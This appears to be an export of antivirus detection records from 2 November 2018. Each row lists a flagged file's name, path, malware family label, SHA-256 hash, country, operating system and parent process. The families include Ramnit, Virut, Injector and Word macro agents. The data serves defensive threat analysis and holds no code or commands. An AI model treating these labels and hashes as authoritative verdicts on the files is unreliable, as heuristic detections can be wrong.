  Row(detection=Row(filename='autorun.exe', filepath='Z:\\Autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T09:24:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.148\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.148\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T11:32:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:09:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050239-7dd23b34', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050239-7DD23B34', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:02:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='barray.dll', filepath='\\\\?\\F:\\高级数据恢复\\数据恢复软件\\Diskgen\\Diskgen\\Barray.dll', filesize=64000, name='W32/Ramnit.CD.#M1.#R1'), hash='67745125a12de2cec47136e8f7ab12d0f683ac397b96d4a054c74ec470f33b87', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:50:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00000963', filepath='C:\\Windows\\Temp\\tmp00000098\\tmp00000963', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T19:45:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rrjpvavq.exe', filepath='F:\\RECYCLER\\S-1-5-12-2772410451-1313380861-030382565-1358\\RRJpVAVQ.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='48865df4239b115f603b0ee3344dc0f61cebbd06250cd75c0e79bd11456bb0f5', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\UsbFix\\UsbFix.exe', parentsize=1999504, timestamp='2018-11-02T16:03:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='feyjlrnm.exe', filepath='f:\\recycler\\s-7-5-57-0134166447-0306465866-823005636-0523\\FeYjLrnm.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061223-3c251f42', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061223-3C251F42', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155118-8b4f1d03', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-155118-8B4F1D03', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:54:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050729-2a918bac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050729-2A918BAC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='QA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T01:23:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-152040-9733b7e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ec41cbbd\\AVSCAN-20181102-151917-8CC5D735\\AVSCAN-20181102-152040-9733B7E6', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T08:12:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061444-8fb141cd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061444-8FB141CD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101846-9485d7f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-101846-9485D7F2', filesize=64000, name='TR/Siggen.rioid.#M1.#R1'), hash='5d45044066fc94a1558c3717b1bab84d8cfc17b7603b888168b9571f1b2b414e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:18:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050320-968c6923', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050320-968C6923', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdf_contract agreement.tar --> j111.exe', filepath='pdf_CONTRACT AGREEMENT.tar --> J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T02:06:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Compressed\\Setup\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T22:51:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055656-1398c32e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055656-1398C32E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060124-b2da3262', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060124-B2DA3262', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-123428-4688caf2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1cb62c39\\AVSCAN-20181102-123129-2C346BB9\\AVSCAN-20181102-123428-4688CAF2', filesize=512000, name='Worm/Delf.512553.#M1.#R1'), hash='7123b8bf12905ac0865284300759bc17d13c9f105fffd3b854dd901b43f040a1', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:34:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061415-7e87440a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061415-7E87440A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='E:\\Tools\\程式集\\[系統工具]\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T22:58:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061346-6d18202a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061346-6D18202A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050322-97c714d6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050322-97C714D6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061120-1691485a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061120-1691485A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052727-f4d38bae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052727-F4D38BAE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051824-b1264205', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051824-B1264205', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054931-0a41844a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054931-0A41844A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061709-e62ded60', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061709-E62DED60', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053040-683aab00', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053040-683AAB00', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055633-05dee590', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055633-05DEE590', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054612-93845eb1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054612-93845EB1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061737-f737d098', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061737-F737D098', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052823-162288bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052823-162288BC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062024-5a9fce7b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062024-5A9FCE7B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050423-bbc4a3fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050423-BBC4A3FB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060313-f3ccaf0c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060313-F3CCAF0C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051027-950e1e52', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051027-950E1E52', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051853-c2d58ccf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051853-C2D58CCF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051634-6fde3aaf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051634-6FDE3AAF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052615-c9dc559a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052615-C9DC559A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051854-c2e87aa9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051854-C2E87AA9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053012-571c1ee5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053012-571C1EE5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050922-6e512cc7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050922-6E512CC7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051652-7ab63c81', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051652-7AB63C81', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054003-b7a3d3ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054003-B7A3D3CE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051357-1241b0c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051357-1241B0C5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055514-d6834289', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055514-D6834289', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053442-f86cd4fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053442-F86CD4FC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060932-d5fc479b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060932-D5FC479B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tprecle13_02004.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Testing Program 2016 Cloud\\Visor\\Excel\\TPRECLE13_02004.exe', filesize=256000, name='HEUR/APC.#M1.#R1'), hash='88cd970ed5ccfa6ed7ec29617394053e0a8cb0fbba2033031b092b46612e814d', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T05:40:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061005-e9c7d8c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061005-E9C7D8C6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T10:31:06Z'), dt=datetime.date(2018, 11, 2)),
